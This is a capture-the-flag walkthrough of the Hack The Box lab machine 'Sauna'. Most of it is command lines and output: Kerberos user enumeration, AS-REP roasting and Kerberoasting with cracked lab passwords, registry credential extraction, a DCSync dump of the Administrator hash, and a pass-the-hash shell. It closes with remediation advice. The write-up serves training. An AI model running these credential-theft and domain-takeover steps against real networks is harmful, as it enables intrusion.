HTB Sauna Walkthrough — Autologon & DCSync Exploitation
HTB Sauna — Full Walkthrough & Writeup¶
Sauna is an easy-difficulty Windows Active Directory machine on Hack The Box. The attack vector starts with username harvesting from the target's public website, generating a list of users, and validating them via Kerbrute. With a valid account, we perform AS-REP Roasting and crack the service account's password. Once inside the system via WinRM, we extract plain text Autologon credentials from the registry, enabling us to pivot to a user who has DCSync rights. We then execute a DCSync attack to dump the domain hashes and gain Domain Admin control.
Machine Information¶
| Property | Value |
|---|---|
| OS | Windows Server 2019 |
| Difficulty | Easy |
| Domain | EGOTISTICAL-BANK.LOCAL |
| DC Hostname | SAUNA |
| IP Address | 10.129.253.42 |
| Foothold Account | fsmith |
Attack Chain Overview¶
The following diagram illustrates the complete attack path from initial enumeration to full domain compromise:
graph TD
A["Website Team Page<br/>(Harvest Employee Names)"] -->|username-anarchy & Kerbrute| B["fsmith<br/>(Valid User Account)"]
B -->|AS-REP Roasting| C["fsmith Hash<br/>(Cracked: Thestrokes23)"]
C -->|Evil-WinRM session| D["WinPEAS Registry Enumerate"]
D -->|Registry Autologon| E["svc_loanmgr<br/>(MDC98xGarSNDxx)"]
E -->|DCSync Permissions| F["DCSync Attack<br/>(Secretsdump Hashdump)"]
F -->|Administrator Hash| G["Domain Admin<br/>(Full Compromise)"]
style A fill:#2d5016,stroke:#4ade80,color:#fff
style B fill:#4a1d96,stroke:#a78bfa,color:#fff
style G fill:#7f1d1d,stroke:#ef4444,color:#fffReconnaissance¶
Initial Nmap Scan¶
We initially performed an Nmap scan, but the results were inconclusive due to potential network issues (e.g., the target machine not responding to ICMP requests). To bypass this, we will re-run the scan with the -Pn flag, which tells Nmap to skip host discovery and assume the target is online.
Open Ports Identified: 1. Port 80: HTTP (Web Application) 2. Port 88: Kerberos (Active Directory) 3. Port 389: LDAP (Active Directory) 4. Port 445: SMB (File Sharing) 5. Port 5985: WinRM (Windows Remote Management) 6. Port 636: LDAPS (Secure LDAP) 7. Port 3268: Global Catalog
These ports suggest the presence of a Domain Controller, as they are common for Active Directory environments.
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ nmap -sC -sV -Pn -p- -oA nmap_output --min-rate 10000 10.129.253.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-31 02:09 IST
Nmap scan report for 10.129.253.42
Host is up (0.088s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-30 21:42:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49721/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 1h02m08s
| smb2-time:
| date: 2024-12-30T21:43:06
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.54 seconds
SMB Null Sessions¶
SMB Null Sessions¶
SMB null sessions are not permitted on the server, and the guest account appears to be disabled.
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ netexec smb 10.129.253.42 -u '' -p '' --shares
SMB 10.129.253.42 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.253.42 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
SMB 10.129.253.42 445 SAUNA [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ netexec smb 10.129.253.42 -u guest -p '' --shares
SMB 10.129.253.42 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.253.42 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\guest: STATUS_ACCOUNT_DISABLED
But at least we know the target's hostname and domain. So, let's update the /etc/hosts file accordingly.
LDAP Null Binding¶
LDAP Null Binding appears to be permitted on the target, but it does not yield significant information.
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ netexec ldap 10.129.253.42 -u '' -p '' --users
SMB 10.129.253.42 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP 10.129.253.42 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
LDAP 10.129.253.42 389 SAUNA [*] Total records returned: 18
LDAP 10.129.253.42 389 SAUNA DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
LDAP 10.129.253.42 389 SAUNA CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
I also tried using ldapsearch, but it did not return any new information.
IIS Website Enumeration¶
We know from Nmap scan that there is an IIS Website running on the target on port 80.
However, the website did not contain much interesting information, and forms such as contact.html and Leave a Reply boxes on the blogs were non-functional.
After some looking around, I was able to get a list of employees from the About Us page.
So, I quickly created a list of potential usernames for these employees using an awesome tool called username-anarchy.
(kali㉿kali)-[~/hack-the-box/sauna]
└─$ username-anarchy/username-anarchy -i employees.txt > potential_usernames.txt
Bruteforcing¶
With a list of potential usernames in hand, I used kerbrute with the userenum flag to guess the usernames, and I successfully obtained at least one valid username: fsmith, which is better than getting nothing.
──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.129.253.42 -o domainusers.txt potential_usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/31/24 - Ronnie Flathers @ropnop
2024/12/31 03:39:31 > Using KDC(s):
2024/12/31 03:39:31 > 10.129.253.42:88
2024/12/31 03:39:31 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2024/12/31 03:39:32 > Done! Tested 88 usernames (1 valid) in 0.856 seconds
AS-REP Roasting¶
Using netexec, I attempted AS-REP Roasting using fsmith account, and I was able to get his hashes.
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ netexec ldap 10.129.253.42 -u 'fsmith' -p '' --asreproast output.txt
SMB 10.129.253.42 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP 10.129.253.42 445 SAUNA $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:eaf4df1b2ce1e9d3c1ca0fa1ab11df7c$4dc59aeabdb019b9fbf37c7bb7b030a6ea60da9b7a1a421d348254087a28fff475bbd38ef079657b9576c1195af2716a42602abb7373f9d7a2200dc4c1add2f3d2b12f57e1610afcde3c62589e591a00507ee244b276c101cd54137a9895c784af998419b50b106bb9fe60f4e52f914ae005a19218c8fc2065f5eea6ba1ab1009289b5cd523181ea64783f420bf21e37456505d24cc96abca9946694adda133f72f6996afcd6fd291ffb61a466743d9aad8654be784266ba55a3da44d035699230b4e8276224976dd7f78edc66719c3d9c7e3ec5a5f2c84c6e342d92d4b7be06e842b073766f396f8b278e983c41b4ea9ec2d317fe7d965ecd73abae01964894
Password Cracking 1¶
Using hashcat the hashes for fsmith were cracked in seconds.
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ hashcat -a 0 -o cracked.txt output.txt /usr/share/wordlists/rockyou.txt
--snip--
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:eaf4df1...964894
Time.Started.....: Tue Dec 31 04:06:03 2024 (14 secs)
Time.Estimated...: Tue Dec 31 04:06:17 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 763.0 kH/s (0.46ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10538496/14344385 (73.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Thip1812 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 75%
Started: Tue Dec 31 04:06:00 2024
Stopped: Tue Dec 31 04:06:19 2024
Password: Thestrokes23
Kerberoasting¶
With one valid credential, I can now check if the target is vulnerable to Kerberoasting. For this, I can either use netexec or impacket's GetUserSPNs. For simplicity, I am going to do it with netexec.
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ netexec ldap 10.129.253.42 -u 'fsmith' -p 'Thestrokes23' --kerberoasting output.txt
SMB 10.129.253.42 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP 10.129.253.42 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
LDAP 10.129.253.42 389 SAUNA Bypassing disabled account krbtgt
LDAP 10.129.253.42 389 SAUNA [*] Total of records returned 1
LDAP 10.129.253.42 389 SAUNA sAMAccountName: HSmith memberOf: pwdLastSet: 2020-01-23 11:24:34.140321 lastLogon:<never>
LDAP 10.129.253.42 389 SAUNA $krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$1b382b5149f10c543b75b8800c2ba818$1ce23353672472f4e3d261718db160e7d10a28761378cb5b898d11d45b08d0962a13a5fd846e39741f699371df7daa3bd4be3eeb6d758b3290413cf9f8c26fe919f53d7924f66d36e611306990c1e2a7824e2b3d85fd442d578920f0ee72ac5ca78fbcde6271d3b25e7741a6645feea20f1f3063bc97b700c37777dbcc785139a97257076f52ee0e9dd0fa93dada10746b34d275fc375c88530e645ef53503b8eec76462f832bce03a1b3d4c11c1c2307a5be1e8d04211f4c948aff16bc9a27a251270e9546095404edf4ebad1696d13222c08ebef3fc3fb68a6041391bad35b5e235c61d7e80f1453e9b6d760208c9699fb33586294942c5eabba48ab534a484502934f47e1acb999ec493d6620641fb08bd3a19ff448f80a32b398f388ef5d13779d43b90c8778b1bd711958c19a78696cce7dfa6e4e473197772c9675f3567d369db0f470cbd6a5413c1f890f14424c79ec1e6900ff69e01624438752c10880eb60ea8981cfb01af4022f01db317d956144087c2e321f136094ebf724df9922485a050d56e0c10ef4ca73941cfbc676aee42e44bc296962dda1a50506e5501b1246a927bd16d60527bf0ce2216049c4192aebf91993e9c63a05a358e7a987db4f9d0b7a64d4e2ab13a7799915db23f5e5ccd15930bce2e8e852aa7e6744601fcf679db01abd768de44eb41addd414ca7979c19a27c9011f288e97dcdcb75748d2fa9eff47285d16a66cfe90a89b757f040600bcff600b68903862e7d57955bac7b2e03a0f93950b1c2929ecd7cef98029c5617f1c1f703f6a187fcd616aa8685d1748819839f5a1ffca9592abecc4ef67dc23d6465b4b4551a9d585699747966a33109ee0f1e9775036d8972f27cc675667806888473bf3e751f94a82249706a4259eb84f83df5c5f58dad9c0e5e532c6bbf33777d8fade6ec663af863957353abcfb2b29f030c59ed131a140dcfe8af24b4eb3aee69c9d42486836c5ff29e34116f1f7ddc196f0bce268ac314cadae8c62a0ddddad36706c3d32244b50a56e723ab0081705c17cd28a0688dd130f1c2428af397c57850c3d478c0ee799b792148e49d7b2da85f670ac403febe11d8d3af0224e601a85db15dd58b7f13bcaff4407f1a745277f2b9e4875bac523f2127be10e93dc5948771aee3011646cfd5665dad789020869e7d92c6d5f6d3eb7c39d812438c460ab2fc1f7ff127aea966337f2f57c87c193e0be24019d9e5c7b981e9391774f28ef0c93ff6496bef1af2c6335d14b3d73c5aa4d56da4a15fd6a4c65897d2b791094533d58f2da4245cff54d4c6100211e807d54166689d9fa74be387c0ab5179f93a0874f58dc4dce771686ce5de8dad380ada1e03e89099060c841869b50749a673faa4197556f3b53bfc10e60ce
Password Cracking 2¶
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ hashcat -a 0 -o cracked.txt output.txt /usr/share/wordlists/rockyou.txt
---snip---
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTI...0e60ce
Time.Started.....: Tue Dec 31 06:29:50 2024 (15 secs)
Time.Estimated...: Tue Dec 31 06:30:05 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 787.8 kH/s (0.45ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10538496/14344385 (73.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Thip1812 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 75%
Started: Tue Dec 31 06:29:50 2024
Stopped: Tue Dec 31 06:30:06 2024
Password for HSmith: Thestrokes23. Funny thing is that both the users have same passwords LOL.
Now, when I try to enumerate the users in the domain, I get the following:
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ netexec ldap 10.129.253.42 -u 'fsmith' -p 'Thestrokes23' --users
SMB 10.129.253.42 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP 10.129.253.42 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
LDAP 10.129.253.42 389 SAUNA [*] Enumerated 6 domain users: EGOTISTICAL-BANK.LOCAL
LDAP 10.129.253.42 389 SAUNA -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.253.42 389 SAUNA Administrator 2021-07-26 16:16:16 0 Built-in account for administering the computer/domain
LDAP 10.129.253.42 389 SAUNA Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.253.42 389 SAUNA krbtgt 2020-01-23 05:45:30 0 Key Distribution Center Service Account
LDAP 10.129.253.42 389 SAUNA HSmith 2020-01-23 05:54:34 0
LDAP 10.129.253.42 389 SAUNA FSmith 2020-01-23 16:45:19 0
LDAP 10.129.253.42 389 SAUNA svc_loanmgr 2020-01-24 23:48:31 0
Looks like this is a very small target with very limited no. of users and service accounts, so our next target must be svc_loanmgr.
Checking permissions, I also know that fsmith has PS Remote permissions on the target:
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ netexec winrm 10.129.253.42 -u 'fsmith' -p 'Thestrokes23'
WINRM 10.129.253.42 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.253.42 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
User flag is located at
C:\Users\FSmith\Desktop\user.txt
Bloodhound¶
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ bloodhound-python -d EGOTISTICAL-BANK.LOCAL -ns 10.129.253.42 -u hsmith -p 'Thestrokes23' -c All --zip
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 16S
INFO: Compressing output into 20241231063543_bloodhound.zip
I quickly uploaded WinPEAS to the machine using Evil-WinRM:
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload winPEASx64.exe
Info: Uploading /usr/share/peass/winpeas/winPEASx64.exe to C:\Users\FSmith\Documents\winPEASx64.exe
Data: 13122900 bytes of 13122900 bytes copied
Info: Upload successful!
Registry Autologon Enumeration¶
Running WinPEAS or performing a manual registry query reveals plaintext credentials stored under the Windows Autologon registry hive:
*Evil-WinRM* PS C:\Users\FSmith\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
...
DefaultUserName REG_SZ svc_loanmgr
DefaultDomainName REG_SZ EGOTISTICAL-BANK.LOCAL
DefaultPassword REG_SZ MDC98xGarSNDxx
AutoAdminLogon REG_SZ 1
We have successfully retrieved the plaintext credentials for the service account:
* Username: svc_loanmgr
* Password: MDC98xGarSNDxx
Autologon Security Risks
The autologon feature stores credentials in the registry in plaintext. Since the Authenticated Users group can read this registry key, any local foothold immediately compromises this account.
Privilege Escalation¶
Lateral Movement as svc_loanmgr¶
Using evil-winrm, we log in as svc_loanmgr:
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ evil-winrm -i 10.129.253.42 -u 'svc_loanmgr' -p 'MDC98xGarSNDxx'
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotistical-bank\svc_loanmgr
DCSync Attack¶
Using BloodHound, we verify that svc_loanmgr has the GetChanges and GetChangesAll permissions (also known as DCSync rights) directly assigned on the domain object. This allows us to request replication of domain objects from the Domain Controller.
We can run impacket-secretsdump using the credentials of svc_loanmgr to extract the NTLM hash of the Administrator account:
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ impacket-secretsdump -just-dc-user Administrator 'egotistical-bank.local/svc_loanmgr:MDC98xGarSNDxx@10.129.253.42'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:82a4d7fca8b6cd23fa4e1bc23a85b9b8:::
[*] Cleaning up...
Gaining Domain Administrator Shell¶
Using the dumped NTLM hash, we perform a Pass-the-Hash (PTH) attack with evil-winrm to obtain a shell as the Domain Administrator:
┌──(kali㉿kali)-[~/hack-the-box/sauna]
└─$ evil-winrm -i 10.129.253.42 -u Administrator -H 82a4d7fca8b6cd23fa4e1bc23a85b9b8
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotistical-bank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
9d0ba2c3...
The Domain Controller is fully compromised!
Lessons Learned¶
1. Hardcoded Registry Autologon Credentials¶
Storing credentials in the registry for Autologon is a high-risk misconfiguration:
- Remediation: Disable AutoAdminLogon by setting it to 0 and remove the DefaultPassword registry value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. If auto-logon is required, use third-party solutions that encrypt credentials or restrict registry read permissions.
2. Excessive Domain Replication (DCSync) Permissions¶
A standard service account (svc_loanmgr) was assigned Active Directory replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All):
- Remediation: Revoke replication privileges from non-Domain Controller accounts. DCSync rights should be strictly reserved for Domain Controller machine accounts and trusted administrative tier-0 users. Regularly audit the DACL of the domain object.